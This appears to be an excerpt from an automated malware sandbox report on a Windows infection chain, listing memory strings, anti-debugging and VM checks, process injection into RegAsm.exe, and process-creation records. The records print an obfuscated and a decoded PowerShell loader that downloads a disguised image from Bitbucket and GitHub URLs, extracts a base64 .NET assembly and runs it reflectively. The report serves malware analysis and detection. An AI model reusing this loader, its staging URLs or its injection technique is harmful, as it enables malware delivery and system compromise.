Source: powershell.exe, 00000006.00000002.1420244282.000001CFD3CC6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: QEMU Virtual CPU
Source: powershell.exe, 00000006.00000002.1420244282.000001CFD4E8F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
Source: powershell.exe, 00000006.00000002.1420244282.000001CFD4E8F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapterX
Source: powershell.exe, 00000006.00000002.1420244282.000001CFD3F02000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000006.00000002.1420244282.000001CFD3F02000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000006.00000002.1420244282.000001CFD4E8F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapterX
Source: powershell.exe, 00000006.00000002.1420244282.000001CFD4E8F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
Source: powershell.exe, 00000006.00000002.1420244282.000001CFD4E8F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapterX
Source: powershell.exe, 00000006.00000002.1420244282.000001CFD4E8F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
Source: powershell.exe, 00000006.00000002.1420244282.000001CFD4E8F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'Add-NetEventVmNetworkAdapter',
Source: powershell.exe, 00000006.00000002.1420244282.000001CFD4E8F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'Get-NetEventVmNetworkAdapter',
Source: powershell.exe, 00000006.00000002.1420244282.000001CFD3F02000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: powershell.exe, 00000006.00000002.1420244282.000001CFD4E8F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
Source: RegAsm.exe, 0000000D.00000002.2557660938.0000000000CDC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

API call chain: ExitProcess graph end node

graph_13-41658

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 13_2_004320EC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

13_2_004320EC

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

13_2_00414EED

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 13_2_00438983 mov eax, dword ptr fs:[00000030h]

13_2_00438983

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 13_2_0040CB6C SetLastError,GetNativeSystemInfo,GetProcessHeap,HeapAlloc,SetLastError,

13_2_0040CB6C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_004320EC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_004320EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0042C576 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_0042C576
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0042C6C4 SetUnhandledExceptionFilter,	13_2_0042C6C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0042C8EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	13_2_0042C8EC

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_8.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4872, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8, type: MEMORYSTR

.NET source code references suspicious native API functions

Source: 6.2.powershell.exe.1cfdff3d3c8.1.raw.unpack, Program.cs	Reference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
Source: 6.2.powershell.exe.1cfdff3d3c8.1.raw.unpack, Program.cs	Reference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
Source: 6.2.powershell.exe.1cfdff3d3c8.1.raw.unpack, Program.cs	Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num4 + 8, ref buffer, 4, ref bytesRead)
Source: 6.2.powershell.exe.1cfdff3d3c8.1.raw.unpack, Program.cs	Reference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num3, length, 12288, 64)
Source: 6.2.powershell.exe.1cfdff3d3c8.1.raw.unpack, Program.cs	Reference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num5, payload, bufferSize, ref bytesRead)

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44D000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 464000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 46A000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 46B000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 46C000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 8E0008	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 13_2_004124EF mouse_event,

13_2_004124EF

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.SmniiFI/niam/sdaeh/sfer/ann/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$codigo = 'wwbo#gu#d##u#fm#zqby#hy#aqbj#gu#u#bv#gk#bgb0#e0#yqbu#ge#zwbl#hi#xq#6#do#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b##g#d0#i#bb#e4#zqb0#c4#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b#bu#hk#c#bl#f0#og#6#fq#b#bz#de#mg#n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgb1#g4#ywb0#gk#bwbu#c##r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#rgby#g8#bqbm#gk#bgbr#hm#i#b7#c##c#bh#hi#yqbt#c##k#bb#hm#d#by#gk#bgbn#fs#xqbd#cq#b#bp#g4#awbz#ck#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#b3#gu#ygbd#gw#aqbl#g4#d##g#d0#i#bo#gu#dw#t#e8#ygbq#gu#ywb0#c##uwb5#hm#d#bl#g0#lgbo#gu#d##u#fc#zqbi#em#b#bp#gu#bgb0#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#c##pq#g#ec#zqb0#c0#ugbh#g4#z#bv#g0#i##t#ek#bgbw#hu#d#bp#gi#agbl#gm#d##g#cq#b#bp#g4#awbz#c##lqbd#g8#dqbu#hq#i##k#gw#aqbu#gs#cw#u#ew#zqbu#gc#d#bo#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgbv#hi#zqbh#gm#a##g#cg#j#bs#gk#bgbr#c##aqbu#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#ck#i#b7#c##d#by#hk#i#b7#c##cgbl#hq#dqby#g4#i##k#hc#zqbi#em#b#bp#gu#bgb0#c4#r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#k##k#gw#aqbu#gs#kq#g#h0#i#bj#ge#d#bj#gg#i#b7#c##ywbv#g4#d#bp#g4#dqbl#c##fq#g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i#by#gu#d#b1#hi#bg#g#cq#bgb1#gw#b##g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##k#gw#aqbu#gs#cw#g#d0#i#b##cg#jwbo#hq#d#bw#hm#og#v#c8#ygbp#hq#ygb1#gm#awbl#hq#lgbv#hi#zw#v#ge#z#bz#hm#zwbm#gq#cwbn#c8#d#bl#hm#d#bp#g4#zw#v#gq#bwb3#g4#b#bv#ge#z#bz#c8#aqbt#gc#xwb0#gu#cwb0#c4#agbw#gc#pw#x#dq#n##0#de#nw#n#cw#i##n#gg#d#b0#h##cw#6#c8#lwby#ge#dw#u#gc#aqb0#gg#dqbi#hu#cwbl#hi#ywbv#g4#d#bl#g4#d##u#gm#bwbt#c8#cwbh#g4#d#bv#g0#yqbs#g8#lwbh#hu#z#bp#hq#lwbt#ge#aqbu#c8#aqbt#gc#xwb0#gu#cwb0#c4#agbw#gc#pw#x#dq#n##0#de#nw#y#dm#jw#p#ds#dq#k#c##i##g#c##i##g#c##i##g#c##i##g#c##j#bp#g0#yqbn#gu#qgb5#hq#zqbz#c##pq#g#eq#bwb3#g4#b#bv#ge#z#be#ge#d#bh#ey#cgbv#g0#t#bp#g4#awbz#c##j#bs#gk#bgbr#hm#ow#n##o#i##g#c##i##g#c##i##g#c##i##g#c##i#bp#gy#i##o#cq#aqbt#ge#zwbl#ei#eqb0#gu#cw#g#c0#bgbl#c##j#bu#hu#b#bs#ck#i#b7#c##j#bp#g0#yqbn#gu#v#bl#hg#d##g#d0#i#bb#fm#eqbz#hq#zqbt#c4#v#bl#hg#d##u#eu#bgbj#g8#z#bp#g4#zwbd#do#ogbv#fq#rg#4#c4#rwbl#hq#uwb0#hi#aqbu#gc#k##k#gk#bqbh#gc#zqbc#hk#d#bl#hm#kq#7##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##g#cq#cwb0#ge#cgb0#ey#b#bh#gc#i##9#c##jw#8#dw#qgbb#fm#rq#2#dq#xwbt#fq#qqbs#fq#pg#+#cc#ow#g#cq#zqbu#gq#rgbs#ge#zw#g#d0#i##n#dw#p#bc#ee#uwbf#dy#n#bf#eu#tgbe#d4#pg#n#ds#i##k#hm#d#bh#hi#d#bj#g4#z#bl#hg#i##9#c##j#bp#g0#yqbn#gu#v#bl#hg#d##u#ek#bgbk#gu#e#bp#gy#k##k#hm#d#bh#hi#d#bg#gw#yqbn#ck#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##k#gu#bgbk#ek#bgbk#gu#e##g#d0#i##k#gk#bqbh#gc#zqbu#gu#e#b0#c4#sqbu#gq#zqb4#e8#zg#o#cq#zqbu#gq#rgbs#ge#zw#p#ds#dq#k#c##i##g#c##i##g#c##i##g#c##i##g#c##aqbm#c##k##k#hm#d#bh#hi#d#bj#g4#z#bl#hg#i##t#gc#zq#g#d##i##t#ge#bgbk#c##j#bl#g4#z#bj#g4#z#bl#hg#i##t#gc#d##g#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##p#c##ew#g#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##g#cs#pq#g#cq#cwb0#ge#cgb0#ey#b#bh#gc#lgbm#gu#bgbn#hq#a##7#c##dq#k#c##i##g#c
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('testpowershell.home'); $method = $type.getmethod('la').invoke($null, [object[]] ('txt.smniifi/niam/sdaeh/sfer/ann/akiseawueji/moc.tnetnocresubuhtig.war//:sptth', '0', 'startupname', 'regasm', '0'))}}" .exe -windowstyle hidden -exec
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$codigo = 'wwbo#gu#d##u#fm#zqby#hy#aqbj#gu#u#bv#gk#bgb0#e0#yqbu#ge#zwbl#hi#xq#6#do#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b##g#d0#i#bb#e4#zqb0#c4#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b#bu#hk#c#bl#f0#og#6#fq#b#bz#de#mg#n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgb1#g4#ywb0#gk#bwbu#c##r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#rgby#g8#bqbm#gk#bgbr#hm#i#b7#c##c#bh#hi#yqbt#c##k#bb#hm#d#by#gk#bgbn#fs#xqbd#cq#b#bp#g4#awbz#ck#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#b3#gu#ygbd#gw#aqbl#g4#d##g#d0#i#bo#gu#dw#t#e8#ygbq#gu#ywb0#c##uwb5#hm#d#bl#g0#lgbo#gu#d##u#fc#zqbi#em#b#bp#gu#bgb0#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#c##pq#g#ec#zqb0#c0#ugbh#g4#z#bv#g0#i##t#ek#bgbw#hu#d#bp#gi#agbl#gm#d##g#cq#b#bp#g4#awbz#c##lqbd#g8#dqbu#hq#i##k#gw#aqbu#gs#cw#u#ew#zqbu#gc#d#bo#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgbv#hi#zqbh#gm#a##g#cg#j#bs#gk#bgbr#c##aqbu#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#ck#i#b7#c##d#by#hk#i#b7#c##cgbl#hq#dqby#g4#i##k#hc#zqbi#em#b#bp#gu#bgb0#c4#r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#k##k#gw#aqbu#gs#kq#g#h0#i#bj#ge#d#bj#gg#i#b7#c##ywbv#g4#d#bp#g4#dqbl#c##fq#g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i#by#gu#d#b1#hi#bg#g#cq#bgb1#gw#b##g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##k#gw#aqbu#gs#cw#g#d0#i#b##cg#jwbo#hq#d#bw#hm#og#v#c8#ygbp#hq#ygb1#gm#awbl#hq#lgbv#hi#zw#v#ge#z#bz#hm#zwbm#gq#cwbn#c8#d#bl#hm#d#bp#g4#zw#v#gq#bwb3#g4#b#bv#ge#z#bz#c8#aqbt#gc#xwb0#gu#cwb0#c4#agbw#gc#pw#x#dq#n##0#de#nw#n#cw#i##n#gg#d#b0#h##cw#6#c8#lwby#ge#dw#u#gc#aqb0#gg#dqbi#hu#cwbl#hi#ywbv#g4#d#bl#g4#d##u#gm#bwbt#c8#cwbh#g4#d#bv#g0#yqbs#g8#lwbh#hu#z#bp#hq#lwbt#ge#aqbu#c8#aqbt#gc#xwb0#gu#cwb0#c4#agbw#gc#pw#x#dq#n##0#de#nw#y#dm#jw#p#ds#dq#k#c##i##g#c##i##g#c##i##g#c##i##g#c##j#bp#g0#yqbn#gu#qgb5#hq#zqbz#c##pq#g#eq#bwb3#g4#b#bv#ge#z#be#ge#d#bh#ey#cgbv#g0#t#bp#g4#awbz#c##j#bs#gk#bgbr#hm#ow#n##o#i##g#c##i##g#c##i##g#c##i##g#c##i#bp#gy#i##o#cq#aqbt#ge#zwbl#ei#eqb0#gu#cw#g#c0#bgbl#c##j#bu#hu#b#bs#ck#i#b7#c##j#bp#g0#yqbn#gu#v#bl#hg#d##g#d0#i#bb#fm#eqbz#hq#zqbt#c4#v#bl#hg#d##u#eu#bgbj#g8#z#bp#g4#zwbd#do#ogbv#fq#rg#4#c4#rwbl#hq#uwb0#hi#aqbu#gc#k##k#gk#bqbh#gc#zqbc#hk#d#bl#hm#kq#7##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##g#cq#cwb0#ge#cgb0#ey#b#bh#gc#i##9#c##jw#8#dw#qgbb#fm#rq#2#dq#xwbt#fq#qqbs#fq#pg#+#cc#ow#g#cq#zqbu#gq#rgbs#ge#zw#g#d0#i##n#dw#p#bc#ee#uwbf#dy#n#bf#eu#tgbe#d4#pg#n#ds#i##k#hm#d#bh#hi#d#bj#g4#z#bl#hg#i##9#c##j#bp#g0#yqbn#gu#v#bl#hg#d##u#ek#bgbk#gu#e#bp#gy#k##k#hm#d#bh#hi#d#bg#gw#yqbn#ck#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##k#gu#bgbk#ek#bgbk#gu#e##g#d0#i##k#gk#bqbh#gc#zqbu#gu#e#b0#c4#sqbu#gq#zqb4#e8#zg#o#cq#zqbu#gq#rgbs#ge#zw#p#ds#dq#k#c##i##g#c##i##g#c##i##g#c##i##g#c##aqbm#c##k##k#hm#d#bh#hi#d#bj#g4#z#bl#hg#i##t#gc#zq#g#d##i##t#ge#bgbk#c##j#bl#g4#z#bj#g4#z#bl#hg#i##t#gc#d##g#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##p#c##ew#g#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##g#cs#pq#g#cq#cwb0#ge#cgb0#ey#b#bh#gc#lgbm#gu#bgbn#hq#a##7#c##dq#k#c##i##g#c	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('testpowershell.home'); $method = $type.getmethod('la').invoke($null, [object[]] ('txt.smniifi/niam/sdaeh/sfer/ann/akiseawueji/moc.tnetnocresubuhtig.war//:sptth', '0', 'startupname', 'regasm', '0'))}}" .exe -windowstyle hidden -exec	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 13_2_0042C3C6 cpuid

13_2_0042C3C6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	13_2_00444161
